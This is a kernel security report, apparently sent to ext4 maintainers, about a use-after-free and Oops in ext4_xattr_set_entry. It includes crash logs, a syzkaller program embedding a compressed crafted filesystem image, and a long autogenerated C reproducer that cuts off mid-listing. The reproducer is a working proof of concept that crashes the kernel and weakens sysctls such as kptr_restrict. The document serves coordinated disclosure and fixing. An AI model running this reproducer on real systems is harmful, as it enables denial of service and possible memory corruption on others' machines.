[SECURITY] ext4: KASAN use-after-free and Oops in ext4_xattr_set_entry with crafted ext4 image

From: 章怿贺

Date: Wed Nov 05 2025 - 09:39:37 EST


Hi,



I would like to report a potential security issue in the Linux kernel ext4 filesystem, which I found using a modified syzkaller-based kernel fuzzing tool that I developed.




Summary


-------



A local unprivileged user who can mount a crafted ext4 filesystem image and call lsetxattr() on a file inside that filesystem can trigger:



1) an Oops in memcpy_orig() called from ext4_xattr_set_entry(), and


2) a subsequent KASAN-reported slab-use-after-free in rwsem_down_write_slowpath().



The bug is triggered by a crafted ext4 image combined with a trusted.overlay.upper extended attribute set on a file in that filesystem.



I could not find an existing CVE that exactly matches this behavior (though I am aware of CVE-2018-10879, CVE-2019-19319, CVE-2019-19767 and CVE-2024-40972, which also involve ext4_xattr_set_entry()). Could you please help confirm whether this is a new vulnerability or a duplicate of a known issue?





Environment


-----------



- Kernel version: 6.12.51 (built with KASAN, PREEMPT, SMP, NOPTI)


- Architecture: x86_64

- Hypervisor: QEMU (Standard PC i440FX + PIIX, BIOS 1.13.0-1ubuntu1.1)

- Filesystem: ext4, mounted from a crafted disk image via /dev/loopN

- Quota mode: writeback

- No journal (mounted r/w without journal)





Symptoms and logs


-----------------



When running the syzkaller reproducer, the kernel hits an Oops in memcpy_orig() from ext4_xattr_set_entry(), followed by file system corruption messages and a KASAN use-after-free report in rwsem_down_write_slowpath().



Relevant part of the first Oops:




    BUG: unable to handle page fault for address: ff1100010f590fe4


    #PF: supervisor write access in kernel mode

    #PF: error_code(0x0003) - permissions violation

    CPU: 2 UID: 0 PID: 1396 Comm: syz.3.37 Not tainted 6.12.51 #3

    RIP: 0010:memcpy_orig+0x31/0x140 arch/x86/lib/memcpy_64.S:71

      ...

    Call Trace:

      ext4_xattr_set_entry+0x10ba/0x17e0 fs/ext4/xattr.c:1813

      ext4_xattr_ibody_set+0x380/0x570 fs/ext4/xattr.c:2283

      ext4_xattr_set_handle+0xa16/0x14d0 fs/ext4/xattr.c:2455

      ext4_xattr_set+0x1e1/0x3a0 fs/ext4/xattr.c:2569

      __vfs_setxattr+0x13e/0x1b0 fs/xattr.c:200

      vfs_setxattr+0x12e/0x330 fs/xattr.c:321

      do_setxattr+0x134/0x1e0 fs/xattr.c:629

      path_setxattr+0x1da/0x220 fs/xattr.c:658

      __x64_sys_lsetxattr+0xc1/0x160 fs/xattr.c:679



After that, ext4 reports block bitmap corruption:




    EXT4-fs error (device loop3): ext4_validate_block_bitmap:440:


      comm syz-executor: bg 0: block 169: padding at end of block bitmap is not set

    EXT4-fs error (device loop3) in ext4_mb_clear_bb:6545: Corrupt filesystem



Then KASAN reports a use-after-free in rwsem_down_write_slowpath():




    BUG: KASAN: slab-use-after-free in owner_on_cpu include/linux/sched.h:2185 [inline]


    BUG: KASAN: slab-use-after-free in rwsem_can_spin_on_owner kernel/locking/rwsem.c:723 [inline]

    BUG: KASAN: slab-use-after-free in rwsem_down_write_slowpath+0x1064/0x1110 kernel/locking/rwsem.c:1111

    Read of size 4 at addr ff1100010a11c5f4 by task syz-executor/859

      ...

    The buggy address belongs to the object at ff1100010a11c5c0 which belongs to the cache task_struct of size 5640

    The buggy address is located 52 bytes inside of freed 5640-byte region [ff1100010a11c5c0, ff1100010a11dbc8)





Reproducer


----------



The issue is reproducible with a syzkaller program and the generated C reproducer.


The reproducer performs roughly the following steps:



1. Use syz_mount_image$ext4 to mount a crafted ext4 image on ./file1 via /dev/loopN,


   with options "norecovery,debug_want_extra_isize=0x3e" and with errors=continue

   added by syzkaller’s helper.

2. Call lchown("./file1", 0, 0) on the mounted path.

3. Call lsetxattr("./file1", "trusted.overlay.upper", buf, 0xe1, 0).



I am attaching (or linking) the full syzkaller reproducer and the autogenerated C reproducer for convenience:



- syzkaller program (human-readable form)


- C reproducer (auto-generated by syzkaller)



I have attached the crash log and a PoC as separate files for your reference.





Security impact


---------------



From my understanding, this is at least a local denial-of-service issue


(kernel crash / panic) reachable by an unprivileged local user who can:



- supply or access a crafted ext4 filesystem image, and


- mount it (for example, via a loop device, container environment, or with

  user namespaces, depending on system configuration), and

- call lsetxattr() on the crafted file.



Because KASAN reports a slab use-after-free involving task_struct objects, I am not sure whether this can be further exploited for privilege escalation, but in principle it looks like a memory corruption bug.



Request


-------



Could you please:




1. Confirm whether this is a new issue or a duplicate of any existing ext4 xattr-related CVE (e.g., CVE-2018-10879, CVE-2019-19319, CVE-2019-19767, CVE-2024-40972), and

2. Advise on the correct fix / commit, once identified?



If it is considered a new security vulnerability, I would like to request or coordinate a CVE ID for it and will reference the relevant patch / mailing list thread in the CVE description.



Thank you very much for your time and for maintaining ext4.




Best regards,


YiHe Zhang


Zhejiang University


Syzkaller reproducer:
# {Threaded:true Repeat:true RepeatTimes:0 Procs:1 Slowdown:1 Sandbox: SandboxArg:0 Leak:false NetInjection:false NetDevices:false NetReset:false Cgroups:false BinfmtMisc:false CloseFDs:false KCSAN:false DevlinkPCI:false NicVF:false USB:false VhciInjection:false Wifi:false IEEE802154:false Sysctl:true Swap:false UseTmpDir:true HandleSegv:true Trace:false CallComments:true LegacyOptions:{Collide:false Fault:false FaultCall:0 FaultNth:0}}
syz_mount_image$ext4(&(0x7f0000000600)='ext4\x00', &(0x7f0000000640)='./file1\x00', 0x0, &(0x7f0000000080)={[{@norecovery}, {@debug_want_extra_isize={'debug_want_extra_isize', 0x3d, 0x3e}}]}, 0x1, 0x603, &(0x7f0000000d80)="$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")
lchown(&(0x7f0000001600)='./file1\x00', 0x0, 0x0)
lsetxattr$trusted_overlay_upper(&(0x7f0000000700)='./file1\x00', &(0x7f0000000740), &(0x7f0000000f40)=ANY=[], 0xe1, 0x0)


C reproducer:
// autogenerated by syzkaller (https://github.com/google/syzkaller)

#define _GNU_SOURCE

#include <dirent.h>
#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <pthread.h>
#include <setjmp.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/mount.h>
#include <sys/prctl.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

#include <linux/futex.h>
#include <linux/loop.h>

#ifndef __NR_memfd_create
#define __NR_memfd_create 319
#endif

static unsigned long long procid;

static __thread int clone_ongoing;
static __thread int skip_segv;
static __thread jmp_buf segv_env;

static void segv_handler(int sig, siginfo_t* info, void* ctx)
{
if (__atomic_load_n(&clone_ongoing, __ATOMIC_RELAXED) != 0) {
exit(sig);
}
uintptr_t addr = (uintptr_t)info->si_addr;
const uintptr_t prog_start = 1 << 20;
const uintptr_t prog_end = 100 << 20;
int skip = __atomic_load_n(&skip_segv, __ATOMIC_RELAXED) != 0;
int valid = addr < prog_start || addr > prog_end;
if (skip && valid) {
_longjmp(segv_env, 1);
}
exit(sig);
}

static void install_segv_handler(void)
{
struct sigaction sa;
memset(&sa, 0, sizeof(sa));
sa.sa_handler = SIG_IGN;
syscall(SYS_rt_sigaction, 0x20, &sa, NULL, 8);
syscall(SYS_rt_sigaction, 0x21, &sa, NULL, 8);
memset(&sa, 0, sizeof(sa));
sa.sa_sigaction = segv_handler;
sa.sa_flags = SA_NODEFER | SA_SIGINFO;
sigaction(SIGSEGV, &sa, NULL);
sigaction(SIGBUS, &sa, NULL);
}

#define NONFAILING(...) \
({ \
int ok = 1; \
__atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST); \
if (_setjmp(segv_env) == 0) { \
__VA_ARGS__; \
} else \
ok = 0; \
__atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST); \
ok; \
})

static void sleep_ms(uint64_t ms)
{
usleep(ms * 1000);
}

static uint64_t current_time_ms(void)
{
struct timespec ts;
if (clock_gettime(CLOCK_MONOTONIC, &ts))
exit(1);
return (uint64_t)ts.tv_sec * 1000 + (uint64_t)ts.tv_nsec / 1000000;
}

static void use_temporary_dir(void)
{
char tmpdir_template[] = "./syzkaller.XXXXXX";
char* tmpdir = mkdtemp(tmpdir_template);
if (!tmpdir)
exit(1);
if (chmod(tmpdir, 0777))
exit(1);
if (chdir(tmpdir))
exit(1);
}

static void thread_start(void* (*fn)(void*), void* arg)
{
pthread_t th;
pthread_attr_t attr;
pthread_attr_init(&attr);
pthread_attr_setstacksize(&attr, 128 << 10);
int i = 0;
for (; i < 100; i++) {
if (pthread_create(&th, &attr, fn, arg) == 0) {
pthread_attr_destroy(&attr);
return;
}
if (errno == EAGAIN) {
usleep(50);
continue;
}
break;
}
exit(1);
}

typedef struct {
int state;
} event_t;

static void event_init(event_t* ev)
{
ev->state = 0;
}

static void event_reset(event_t* ev)
{
ev->state = 0;
}

static void event_set(event_t* ev)
{
if (ev->state)
exit(1);
__atomic_store_n(&ev->state, 1, __ATOMIC_RELEASE);
syscall(SYS_futex, &ev->state, FUTEX_WAKE | FUTEX_PRIVATE_FLAG, 1000000);
}

static void event_wait(event_t* ev)
{
while (!__atomic_load_n(&ev->state, __ATOMIC_ACQUIRE))
syscall(SYS_futex, &ev->state, FUTEX_WAIT | FUTEX_PRIVATE_FLAG, 0, 0);
}

static int event_isset(event_t* ev)
{
return __atomic_load_n(&ev->state, __ATOMIC_ACQUIRE);
}

static int event_timedwait(event_t* ev, uint64_t timeout)
{
uint64_t start = current_time_ms();
uint64_t now = start;
for (;;) {
uint64_t remain = timeout - (now - start);
struct timespec ts;
ts.tv_sec = remain / 1000;
ts.tv_nsec = (remain % 1000) * 1000 * 1000;
syscall(SYS_futex, &ev->state, FUTEX_WAIT | FUTEX_PRIVATE_FLAG, 0, &ts);
if (__atomic_load_n(&ev->state, __ATOMIC_ACQUIRE))
return 1;
now = current_time_ms();
if (now - start > timeout)
return 0;
}
}

static bool write_file(const char* file, const char* what, ...)
{
char buf[1024];
va_list args;
va_start(args, what);
vsnprintf(buf, sizeof(buf), what, args);
va_end(args);
buf[sizeof(buf) - 1] = 0;
int len = strlen(buf);
int fd = open(file, O_WRONLY | O_CLOEXEC);
if (fd == -1)
return false;
if (write(fd, buf, len) != len) {
int err = errno;
close(fd);
errno = err;
return false;
}
close(fd);
return true;
}

//% This code is derived from puff.{c,h}, found in the zlib development. The
//% original files come with the following copyright notice:

//% Copyright (C) 2002-2013 Mark Adler, all rights reserved
//% version 2.3, 21 Jan 2013
//% This software is provided 'as-is', without any express or implied
//% warranty. In no event will the author be held liable for any damages
//% arising from the use of this software.
//% Permission is granted to anyone to use this software for any purpose,
//% including commercial applications, and to alter it and redistribute it
//% freely, subject to the following restrictions:
//% 1. The origin of this software must not be misrepresented; you must not
//% claim that you wrote the original software. If you use this software
//% in a product, an acknowledgment in the product documentation would be
//% appreciated but is not required.
//% 2. Altered source versions must be plainly marked as such, and must not be
//% misrepresented as being the original software.
//% 3. This notice may not be removed or altered from any source distribution.
//% Mark Adler madler@xxxxxxxxxxxxxxxxxx

//% BEGIN CODE DERIVED FROM puff.{c,h}

#define MAXBITS 15
#define MAXLCODES 286
#define MAXDCODES 30
#define MAXCODES (MAXLCODES + MAXDCODES)
#define FIXLCODES 288

struct puff_state {
unsigned char* out;
unsigned long outlen;
unsigned long outcnt;
const unsigned char* in;
unsigned long inlen;
unsigned long incnt;
int bitbuf;
int bitcnt;
jmp_buf env;
};
static int puff_bits(struct puff_state* s, int need)
{
long val = s->bitbuf;
while (s->bitcnt < need) {
if (s->incnt == s->inlen)
longjmp(s->env, 1);
val |= (long)(s->in[s->incnt++]) << s->bitcnt;
s->bitcnt += 8;
}
s->bitbuf = (int)(val >> need);
s->bitcnt -= need;
return (int)(val & ((1L << need) - 1));
}
static int puff_stored(struct puff_state* s)
{
s->bitbuf = 0;
s->bitcnt = 0;
if (s->incnt + 4 > s->inlen)
return 2;
unsigned len = s->in[s->incnt++];
len |= s->in[s->incnt++] << 8;
if (s->in[s->incnt++] != (~len & 0xff) ||
s->in[s->incnt++] != ((~len >> 8) & 0xff))
return -2;
if (s->incnt + len > s->inlen)
return 2;
if (s->outcnt + len > s->outlen)
return 1;
for (; len--; s->outcnt++, s->incnt++) {
if (s->in[s->incnt])
s->out[s->outcnt] = s->in[s->incnt];
}
return 0;
}
struct puff_huffman {
short* count;
short* symbol;
};
static int puff_decode(struct puff_state* s, const struct puff_huffman* h)
{
int first = 0;
int index = 0;
int bitbuf = s->bitbuf;
int left = s->bitcnt;
int code = first = index = 0;
int len = 1;
short* next = h->count + 1;
while (1) {
while (left--) {
code |= bitbuf & 1;
bitbuf >>= 1;
int count = *next++;
if (code - count < first) {
s->bitbuf = bitbuf;
s->bitcnt = (s->bitcnt - len) & 7;
return h->symbol[index + (code - first)];
}
index += count;
first += count;
first <<= 1;
code <<= 1;
len++;
}
left = (MAXBITS + 1) - len;
if (left == 0)
break;
if (s->incnt == s->inlen)
longjmp(s->env, 1);
bitbuf = s->in[s->incnt++];
if (left > 8)
left = 8;
}
return -10;
}
static int puff_construct(struct puff_huffman* h, const short* length, int n)
{
int len;
for (len = 0; len <= MAXBITS; len++)
h->count[len] = 0;
int symbol;
for (symbol = 0; symbol < n; symbol++)
(h->count[length[symbol]])++;
if (h->count[0] == n)
return 0;
int left = 1;
for (len = 1; len <= MAXBITS; len++) {
left <<= 1;
left -= h->count[len];
if (left < 0)
return left;
}
short offs[MAXBITS + 1];
offs[1] = 0;
for (len = 1; len < MAXBITS; len++)
offs[len + 1] = offs[len] + h->count[len];
for (symbol = 0; symbol < n; symbol++)
if (length[symbol] != 0)
h->symbol[offs[length[symbol]]++] = symbol;
return left;
}
static int puff_codes(struct puff_state* s, const struct puff_huffman* lencode,
const struct puff_huffman* distcode)
{
static const short lens[29] = {3, 4, 5, 6, 7, 8, 9, 10, 11, 13,
15, 17, 19, 23, 27, 31, 35, 43, 51, 59,
67, 83, 99, 115, 131, 163, 195, 227, 258};
static const short lext[29] = {0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 2, 2, 2,
2, 3, 3, 3, 3, 4, 4, 4, 4, 5, 5, 5, 5, 0};
static const short dists[30] = {
1, 2, 3, 4, 5, 7, 9, 13, 17, 25,
33, 49, 65, 97, 129, 193, 257, 385, 513, 769,
1025, 1537, 2049, 3073, 4097, 6145, 8193, 12289, 16385, 24577};
static const short dext[30] = {0, 0, 0, 0, 1, 1, 2, 2, 3, 3,
4, 4, 5, 5, 6, 6, 7, 7, 8, 8,
9, 9, 10, 10, 11, 11, 12, 12, 13, 13};
int symbol;
do {
symbol = puff_decode(s, lencode);
if (symbol < 0)
return symbol;
if (symbol < 256) {
if (s->outcnt == s->outlen)
return 1;
if (symbol)
s->out[s->outcnt] = symbol;
s->outcnt++;
} else if (symbol > 256) {
symbol -= 257;
if (symbol >= 29)
return -10;
int len = lens[symbol] + puff_bits(s, lext[symbol]);
symbol = puff_decode(s, distcode);
if (symbol < 0)
return symbol;
unsigned dist = dists[symbol] + puff_bits(s, dext[symbol]);
if (dist > s->outcnt)
return -11;
if (s->outcnt + len > s->outlen)
return 1;
while (len--) {
if (dist <= s->outcnt && s->out[s->outcnt - dist])
s->out[s->outcnt] = s->out[s->outcnt - dist];
s->outcnt++;
}
}
} while (symbol != 256);
return 0;
}
static int puff_fixed(struct puff_state* s)
{
static int virgin = 1;
static short lencnt[MAXBITS + 1], lensym[FIXLCODES];
static short distcnt[MAXBITS + 1], distsym[MAXDCODES];
static struct puff_huffman lencode, distcode;
if (virgin) {
lencode.count = lencnt;
lencode.symbol = lensym;
distcode.count = distcnt;
distcode.symbol = distsym;
short lengths[FIXLCODES];
int symbol;
for (symbol = 0; symbol < 144; symbol++)
lengths[symbol] = 8;
for (; symbol < 256; symbol++)
lengths[symbol] = 9;
for (; symbol < 280; symbol++)
lengths[symbol] = 7;
for (; symbol < FIXLCODES; symbol++)
lengths[symbol] = 8;
puff_construct(&lencode, lengths, FIXLCODES);
for (symbol = 0; symbol < MAXDCODES; symbol++)
lengths[symbol] = 5;
puff_construct(&distcode, lengths, MAXDCODES);
virgin = 0;
}
return puff_codes(s, &lencode, &distcode);
}
static int puff_dynamic(struct puff_state* s)
{
static const short order[19] = {16, 17, 18, 0, 8, 7, 9, 6, 10, 5,
11, 4, 12, 3, 13, 2, 14, 1, 15};
int nlen = puff_bits(s, 5) + 257;
int ndist = puff_bits(s, 5) + 1;
int ncode = puff_bits(s, 4) + 4;
if (nlen > MAXLCODES || ndist > MAXDCODES)
return -3;
short lengths[MAXCODES];
int index;
for (index = 0; index < ncode; index++)
lengths[order[index]] = puff_bits(s, 3);
for (; index < 19; index++)
lengths[order[index]] = 0;
short lencnt[MAXBITS + 1], lensym[MAXLCODES];
struct puff_huffman lencode = {lencnt, lensym};
int err = puff_construct(&lencode, lengths, 19);
if (err != 0)
return -4;
index = 0;
while (index < nlen + ndist) {
int symbol;
int len;
symbol = puff_decode(s, &lencode);
if (symbol < 0)
return symbol;
if (symbol < 16)
lengths[index++] = symbol;
else {
len = 0;
if (symbol == 16) {
if (index == 0)
return -5;
len = lengths[index - 1];
symbol = 3 + puff_bits(s, 2);
} else if (symbol == 17)
symbol = 3 + puff_bits(s, 3);
else
symbol = 11 + puff_bits(s, 7);
if (index + symbol > nlen + ndist)
return -6;
while (symbol--)
lengths[index++] = len;
}
}
if (lengths[256] == 0)
return -9;
err = puff_construct(&lencode, lengths, nlen);
if (err && (err < 0 || nlen != lencode.count[0] + lencode.count[1]))
return -7;
short distcnt[MAXBITS + 1], distsym[MAXDCODES];
struct puff_huffman distcode = {distcnt, distsym};
err = puff_construct(&distcode, lengths + nlen, ndist);
if (err && (err < 0 || ndist != distcode.count[0] + distcode.count[1]))
return -8;
return puff_codes(s, &lencode, &distcode);
}
static int puff(unsigned char* dest, unsigned long* destlen,
const unsigned char* source, unsigned long sourcelen)
{
struct puff_state s = {
.out = dest,
.outlen = *destlen,
.outcnt = 0,
.in = source,
.inlen = sourcelen,
.incnt = 0,
.bitbuf = 0,
.bitcnt = 0,
};
int err;
if (setjmp(s.env) != 0)
err = 2;
else {
int last;
do {
last = puff_bits(&s, 1);
int type = puff_bits(&s, 2);
err = type == 0 ? puff_stored(&s)
: (type == 1 ? puff_fixed(&s)
: (type == 2 ? puff_dynamic(&s) : -1));
if (err != 0)
break;
} while (!last);
}
*destlen = s.outcnt;
return err;
}

//% END CODE DERIVED FROM puff.{c,h}

#define ZLIB_HEADER_WIDTH 2

static int puff_zlib_to_file(const unsigned char* source,
unsigned long sourcelen, int dest_fd)
{
if (sourcelen < ZLIB_HEADER_WIDTH)
return 0;
source += ZLIB_HEADER_WIDTH;
sourcelen -= ZLIB_HEADER_WIDTH;
const unsigned long max_destlen = 132 << 20;
void* ret = mmap(0, max_destlen, PROT_WRITE | PROT_READ,
MAP_PRIVATE | MAP_ANON, -1, 0);
if (ret == MAP_FAILED)
return -1;
unsigned char* dest = (unsigned char*)ret;
unsigned long destlen = max_destlen;
int err = puff(dest, &destlen, source, sourcelen);
if (err) {
munmap(dest, max_destlen);
errno = -err;
return -1;
}
if (write(dest_fd, dest, destlen) != (ssize_t)destlen) {
munmap(dest, max_destlen);
return -1;
}
return munmap(dest, max_destlen);
}

static int setup_loop_device(unsigned char* data, unsigned long size,
const char* loopname, int* loopfd_p)
{
int err = 0, loopfd = -1;
int memfd = syscall(__NR_memfd_create, "syzkaller", 0);
if (memfd == -1) {
err = errno;
goto error;
}
if (puff_zlib_to_file(data, size, memfd)) {
err = errno;
goto error_close_memfd;
}
loopfd = open(loopname, O_RDWR);
if (loopfd == -1) {
err = errno;
goto error_close_memfd;
}
if (ioctl(loopfd, LOOP_SET_FD, memfd)) {
if (errno != EBUSY) {
err = errno;
goto error_close_loop;
}
ioctl(loopfd, LOOP_CLR_FD, 0);
usleep(1000);
if (ioctl(loopfd, LOOP_SET_FD, memfd)) {
err = errno;
goto error_close_loop;
}
}
close(memfd);
*loopfd_p = loopfd;
return 0;

error_close_loop:
close(loopfd);
error_close_memfd:
close(memfd);
error:
errno = err;
return -1;
}

static void reset_loop_device(const char* loopname)
{
int loopfd = open(loopname, O_RDWR);
if (loopfd == -1) {
return;
}
if (ioctl(loopfd, LOOP_CLR_FD, 0)) {
}
close(loopfd);
}

static long syz_mount_image(volatile long fsarg, volatile long dir,
volatile long flags, volatile long optsarg,
volatile long change_dir,
volatile unsigned long size, volatile long image)
{
unsigned char* data = (unsigned char*)image;
int res = -1, err = 0, need_loop_device = !!size;
char* mount_opts = (char*)optsarg;
char* target = (char*)dir;
char* fs = (char*)fsarg;
char* source = NULL;
char loopname[64];
if (need_loop_device) {
int loopfd;
memset(loopname, 0, sizeof(loopname));
snprintf(loopname, sizeof(loopname), "/dev/loop%llu", procid);
if (setup_loop_device(data, size, loopname, &loopfd) == -1)
return -1;
close(loopfd);
source = loopname;
}
mkdir(target, 0777);
char opts[256];
memset(opts, 0, sizeof(opts));
if (strlen(mount_opts) > (sizeof(opts) - 32)) {
}
strncpy(opts, mount_opts, sizeof(opts) - 32);
if (strcmp(fs, "iso9660") == 0) {
flags |= MS_RDONLY;
} else if (strncmp(fs, "ext", 3) == 0) {
bool has_remount_ro = false;
char* remount_ro_start = strstr(opts, "errors=remount-ro");
if (remount_ro_start != NULL) {
char after = *(remount_ro_start + strlen("errors=remount-ro"));
char before = remount_ro_start == opts ? '\0' : *(remount_ro_start - 1);
has_remount_ro = ((before == '\0' || before == ',') &&
(after == '\0' || after == ','));
}
if (strstr(opts, "errors=panic") || !has_remount_ro)
strcat(opts, ",errors=continue");
} else if (strcmp(fs, "xfs") == 0) {
strcat(opts, ",nouuid");
} else if (strncmp(fs, "gfs2", 4) == 0 &&
(strstr(opts, "errors=panic") || strstr(opts, "debug"))) {
strcat(opts, ",errors=withdraw");
}
res = mount(source, target, fs, flags, opts);
if (res == -1) {
err = errno;
goto error_clear_loop;
}
res = open(target, O_RDONLY | O_DIRECTORY);
if (res == -1) {
err = errno;
goto error_clear_loop;
}
if (change_dir) {
res = chdir(target);
if (res == -1) {
err = errno;
}
}

error_clear_loop:
if (need_loop_device)
reset_loop_device(loopname);
errno = err;
return res;
}

#define FS_IOC_SETFLAGS _IOW('f', 2, long)
static void remove_dir(const char* dir)
{
int iter = 0;
DIR* dp = 0;
const int umount_flags = MNT_FORCE | UMOUNT_NOFOLLOW;

retry:
while (umount2(dir, umount_flags) == 0) {
}
dp = opendir(dir);
if (dp == NULL) {
if (errno == EMFILE) {
exit(1);
}
exit(1);
}
struct dirent* ep = 0;
while ((ep = readdir(dp))) {
if (strcmp(ep->d_name, ".") == 0 || strcmp(ep->d_name, "..") == 0)
continue;
char filename[FILENAME_MAX];
snprintf(filename, sizeof(filename), "%s/%s", dir, ep->d_name);
while (umount2(filename, umount_flags) == 0) {
}
struct stat st;
if (lstat(filename, &st))
exit(1);
if (S_ISDIR(st.st_mode)) {
remove_dir(filename);
continue;
}
int i;
for (i = 0;; i++) {
if (unlink(filename) == 0)
break;
if (errno == EPERM) {
int fd = open(filename, O_RDONLY);
if (fd != -1) {
long flags = 0;
if (ioctl(fd, FS_IOC_SETFLAGS, &flags) == 0) {
}
close(fd);
continue;
}
}
if (errno == EROFS) {
break;
}
if (errno != EBUSY || i > 100)
exit(1);
if (umount2(filename, umount_flags))
exit(1);
}
}
closedir(dp);
for (int i = 0;; i++) {
if (rmdir(dir) == 0)
break;
if (i < 100) {
if (errno == EPERM) {
int fd = open(dir, O_RDONLY);
if (fd != -1) {
long flags = 0;
if (ioctl(fd, FS_IOC_SETFLAGS, &flags) == 0) {
}
close(fd);
continue;
}
}
if (errno == EROFS) {
break;
}
if (errno == EBUSY) {
if (umount2(dir, umount_flags))
exit(1);
continue;
}
if (errno == ENOTEMPTY) {
if (iter < 100) {
iter++;
goto retry;
}
}
}
exit(1);
}
}

static void kill_and_wait(int pid, int* status)
{
kill(-pid, SIGKILL);
kill(pid, SIGKILL);
for (int i = 0; i < 100; i++) {
if (waitpid(-1, status, WNOHANG | __WALL) == pid)
return;
usleep(1000);
}
DIR* dir = opendir("/sys/fs/fuse/connections");
if (dir) {
for (;;) {
struct dirent* ent = readdir(dir);
if (!ent)
break;
if (strcmp(ent->d_name, ".") == 0 || strcmp(ent->d_name, "..") == 0)
continue;
char abort[300];
snprintf(abort, sizeof(abort), "/sys/fs/fuse/connections/%s/abort",
ent->d_name);
int fd = open(abort, O_WRONLY);
if (fd == -1) {
continue;
}
if (write(fd, abort, 1) < 0) {
}
close(fd);
}
closedir(dir);
} else {
}
while (waitpid(-1, status, __WALL) != pid) {
}
}

static void reset_loop()
{
char buf[64];
snprintf(buf, sizeof(buf), "/dev/loop%llu", procid);
int loopfd = open(buf, O_RDWR);
if (loopfd != -1) {
ioctl(loopfd, LOOP_CLR_FD, 0);
close(loopfd);
}
}

static void setup_test()
{
prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0);
setpgrp();
write_file("/proc/self/oom_score_adj", "1000");
if (symlink("/dev/binderfs", "./binderfs")) {
}
}

static void setup_sysctl()
{
int cad_pid = fork();
if (cad_pid < 0)
exit(1);
if (cad_pid == 0) {
for (;;)
sleep(100);
}
char tmppid[32];
snprintf(tmppid, sizeof(tmppid), "%d", cad_pid);
struct {
const char* name;
const char* data;
} files[] = {
{"/sys/kernel/debug/x86/nmi_longest_ns", "10000000000"},
{"/proc/sys/kernel/hung_task_check_interval_secs", "20"},
{"/proc/sys/net/core/bpf_jit_kallsyms", "1"},
{"/proc/sys/net/core/bpf_jit_harden", "0"},
{"/proc/sys/kernel/kptr_restrict", "0"},
{"/proc/sys/kernel/softlockup_all_cpu_backtrace", "1"},
{"/proc/sys/fs/mount-max", "100"},
{"/proc/sys/vm/oom_dump_tasks", "0"},
{"/proc/sys/debug/exception-trace", "0"},
{"/proc/sys/kernel/printk", "7 4 1 3"},
